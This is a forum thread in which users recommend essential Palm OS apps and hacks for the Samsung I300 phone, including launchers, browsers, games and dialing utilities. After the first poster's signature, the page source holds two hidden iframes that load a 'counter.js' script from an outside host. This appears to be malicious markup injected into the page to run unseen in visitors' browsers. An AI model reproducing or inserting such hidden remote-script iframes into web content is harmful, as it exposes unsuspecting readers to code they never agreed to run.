+ Reply to Thread

Question What are some Core Apps to Download?

I haven't added much to my I300 since I purchased it, so I was wondering what might be considered some "core" apps to add to the device. Any ideas on some essential applications? Mucho thanks!

Jim<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

definately Launcher III, FIlez. if you have MSN or hotmail, get Mobile mail.. its the only app out there to get MSN mail...

make sure you have blazer 2.0 and palm desktop 4.0.1...

Big clock is also a good one...

more to follow...

Lemmings, Jumpman Zero, and Froggy all get enthusiastic recommendations.

Graphically, all three are quite faithful to the originals that inspired them.

Sonically... well, all Lemmings needs is a digitized "Let's Go!" and "Oh NO!" to be flawless. Jumpman Zero's sound needs a little more work, but it's still a work in progress. Froggy's sound is good, and would be flawless with the addition of the original Frogger music... but the Palm wouldn't do justice to the music.

PalmBoy with Pokemon

How about a patriotic prog?? Flag.prc

How about a patriotic prog?? (I think that's spelled wrong)

Anyway this looks kinda neat on my I300:p

How about a patriotic prog?? Flag.prc

Let's try this again

How about a patriotic prog??

Tried to attach .zip file but I don't think it's working. Sorry
    Attached Files

Bejeweled! My whole household is now addicted to it.

Vindigo is excellent if you're in one of the supported cities, or traveling to one.

-Patti

My recommendations :

1. X-master for loading lots of useful Hacks that add to the functionality of Palm usage
    2.My Notespad for taking quick notes in your handwriting
    3. JunglePort for travel
    4. Try AddressPlus for enhanced Contact mgmt.
    5. Blazer definetely
    6. Bigclock can be useful but I suspect it is locking phone/voice memo buttons in my phone. I might be wrong.
    7. Try Silverscreen to better manage apps/shortcuts etc..but again I had to remove this suspecting of locking out phone button.

Administrator

Arrow

FYI, silverscreen has been known to cause errorso n the i300 and 6035...

My understanding is that the I300 stock OS (3.5.2) is not upgradeable, at least with any generic Palm OS version available. Do I stand corrected?

XMaster does work on the I300, but the OS isn't excatly standard, so which hacks are proven to work reliably?

Administrator
    Originally posted by phil
    My understanding is that the I300 stock OS (3.5.2) is not upgradeable, at least with any generic Palm OS version available. Do I stand corrected?

XMaster does work on the I300, but the OS isn't excatly standard, so which hacks are proven to work reliably?
    correct phil, and xmaster works well on the i300...

there are a lot of hacks that will work on the i3000 and alot that wont work 100 %... it sbasically just trial and error... but be sure and have backups (be sure and have desktop 4.0.1) and you wont have any problems trying them out...

Can you share with us the software/hacks that you've found work reliably? That way we can all build on each others' experiences <G>.

Desktop 4.0.1 is indeed the one to have, necessary for IR syncing.

TakePhone one-finger dialing program is fantastic.

ActionNames is another big winner for me. When you set an appointment or to-do you can include the contact from the address book. Then when you need to call them, you can click on the appointment or to-do and click DIAL. This is what the i300 was meant to do! You can also use the same method to look up their address for that matter.

These 2 programs has made my i300 truly integrated in the way that Samsung truly forgot to. If you haven't tried these two programs, you really must.